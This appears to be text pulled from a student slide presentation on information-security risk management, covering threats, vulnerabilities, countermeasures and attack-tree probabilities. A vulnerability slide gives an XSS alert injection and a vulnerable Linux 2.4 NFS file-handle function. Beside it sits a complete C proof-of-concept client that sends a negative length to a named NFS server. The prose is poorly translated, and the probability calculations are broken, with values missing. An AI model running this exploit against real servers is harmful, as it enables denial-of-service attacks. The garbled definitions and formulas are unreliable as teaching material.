Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami

Agenda The definition of Risk, and the sections Countermeasures in the event of Risk How to manage the Risk and probability

The definition of Risk and the sections The Risk is there is probably a threat and therefore can be exploited if used that threat might be called the Vulnerability Of this definition could be to separate the main sections of the Risk  Threat-: is the process of trying to access to confidential information of the Organization  Vulnerabilities: and that there are weaknesses in the organization can engage in which the attacker

Vulnerabilities Composed of two types and two  Technical Vulnerability :whether weak immunization and use of this vulnerability before the attacker knows the attack, the attack of technical  Administrative Vulnerability : Attack is the so-called non-technical or social engineering attack

Vulnerabilities And can be divided in terms of ease and difficulty of the two  High-level Vulnerability: an example is easy to use in writing software code to exploit that gap  Low-level Vulnerability: is the use of the most difficult and requires a lot of sources of financial sources or a long time the attacker

Example Vulnerability of XSS ( Cross Site Scripting ) HTML,JavaScript,VBscript,ActiveX,Flash ) Amend the URL address for a given site alert('Welcome') alert('Welcome')

Please login with the form below before proceeding: Login: Password:

Vulnerabilities unsigned linux-2.4, signed/unsigned static inline u32* decode_fh(u32 *p, struct svc_fh *fhp) { unsigned int size; fh_init(fhp, NFS3_FHSIZE); size = ntohl(*p++); if (size > NFS3_FHSIZE) return NULL; memcpy(&fhp->fh_handle.fh_base, p, size); fhp->fh_handle.fh_size = size; return p + XDR_QUADLEN(size); }

كود#include #include #define NFSPROG #define NFSVERS 3 #define NFSPROC_GETATTR 1 static struct diropargs heh; bool_t xdr_heh(XDR *xdrs, diropargs *heh) { int32_t werd = -1; return xdr_int32_t(xdrs, &werd); } int main(void) { CLIENT * client; struct timeval tv; client = clnt_create("marduk", NFSPROG, NFSVERS, "udp"); if(client == NULL) { perror("clnt_create\n"); } tv.tv_sec = 3; tv.tv_usec = 0; client->cl_auth = authunix_create_default(); clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh, (xdrproc_t) xdr_void, NULL, tv); return 0; }

Threat There are three essential components of a threat  Target  Agent  Event

Target Is the organization's information and the attacker can work on each of the following  Confidentiality: disclosure and that the confidential information to others  Integrity: possibility of changing the organization's information  Availability: and by denial of service via Dos  Accountability: It is not punished for it by the attacker to conceal the attack

Agents There must be three features  Access to the target: it may be a direct access to any account has to enter the system and may be indirectly through an intermediary  Knowledge about the target  Motivation

Events Is in many ways be the most important and ill-authorized access, and others authorized to information or the system either through the development of malicious codes (viruses or Trojan) of the Regulations

Countermeasures in the event of Risk There is no doubt that the information varies from facility to facility and information according to the institution by institution, the importance of information to take appropriate action may be to intervene before a danger, and called the Proactive Model and intervention may be after the occurrence of danger and called the Reactive Model

Countermeasures in the event of Risk There are some examples of countermeasures to the threat or attack  Firewalls  Anti-virus software  Access Control  Two-factor authentication systems  Well-trained employees

How to manage the Risk and probability Steps involved in risk management  Risk Analysis  Decision Management  Implementation

How to manage the Risk and probability Risk management, where intervention is divided into two sections:  Reactive Model : It is a very famous type is the so-called emotional intervention For example, a security official in the company to download anti-virus program after the virus is spreading and destroying some devices can be calculated as follows Protection cost = total cost of the risk + the cost of countermeasures

How to manage the Risk and probability  Proactive Model :Prior to the Risk of this type is much better in terms of cost Protection cost = cost of the minimum risk + the cost of countermeasures

How to manage the Risk and probability Account the possibility of a threat:  the beginning of the top of any tree to be in the form of  The search for the roads leading to the occurrence of or potential threat  The collection of these methods to use (or,And(  to calculate the potential, we start from the top down

How to manage the Risk and probability

Example When the attacker tries to break the password Root Either that the attacker tries to find the root of the word by guessing Guessing the root password Or attack the network as a whole to try and there Bugs in the network And at this point is to achieve two of Bugs 1-there are gaps that can be exploited (And, or) must verify the condition II with 2- that does not happen the system (b Trigram any potential path for this gap

How to manage the Risk and probability

P(guessing root password = A) = 5/1000 = P(exploiting (( active server = B) = 50 /1000 = 0.05 (AND) P (system is not updated or not configured properly =C) = 0.1

How to manage the Risk and probability Assumptions made in the guess a password equal to the exploitation of the gap and b, the latter if there is no system c P(attack service =BC) = P(B)*P(C) = 0.05 * 0.1 = ( AND) P(break-in = (total)(P(A)+P(BC)-P(A)P(BC) = – *0.005 = ( OR) (Total Probability ) break0in

Reference Prentice.Hall.Cryptography.and.Network.Security.4t h.Edition.Nov.2005